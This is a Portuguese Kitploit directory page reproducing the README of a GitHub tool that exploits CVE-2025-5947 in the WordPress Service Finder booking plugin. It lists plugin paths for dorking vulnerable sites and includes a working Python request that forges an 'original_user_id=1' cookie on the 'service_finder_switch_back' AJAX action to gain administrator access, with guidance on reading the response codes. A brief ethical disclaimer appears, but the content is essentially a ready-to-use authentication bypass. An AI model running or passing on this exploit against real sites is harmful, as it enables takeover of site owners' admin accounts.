Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-5947_Exploit — Um mini exploit para o plugin Service Finder - Bookings do WP | Kitploit
Ferramentas/GitHubGitHub/m4rgs/cve-2025-5947_exploit
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

Um mini exploit para o plugin Service Finder - Bookings do WP

Ver Repositório
1há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔍 Exploração de Plugin WordPress — Service Finder (sf-booking)

Visão Geral

O plugin Service Finder é um sistema de reservas e gestão de serviços para WordPress.
Devido à sua popularidade e complexidade, algumas versões tiveram problemas de segurança relacionados a endpoints AJAX não autenticados ou controlos de acesso inadequados.

Este README explica como os investigadores podem identificar instalações com segurança e seguir práticas éticas (dbr krk).


Dorks WP vulneráveis

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


Fluxo de Exploração

⚠️ Aviso:
Estas pesquisas destinam-se apenas a fins educacionais e de investigação. Não tente aceder ou explorar sem autorização.

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ VULNERÁVEL! Redireciona para o painel de administração como ADMIN
  • 400-499: ⚠️ Erro de cliente — o pedido foi inválido ou não autorizado, não vulnerável

Referências

  • Base de Dados de Plugins WPScan — https://wpscan.com/plugins/
  • Base de Dados Nacional de Vulnerabilidades (NVD) — https://nvd.nist.gov/
  • OWASP — Técnicas de Google Dorking / reconhecimento
  • Diretrizes de Divulgação HackerOne — https://www.hackerone.com/disclosure-guidelines

Autor

Taha Mounir


Baixar ferramenta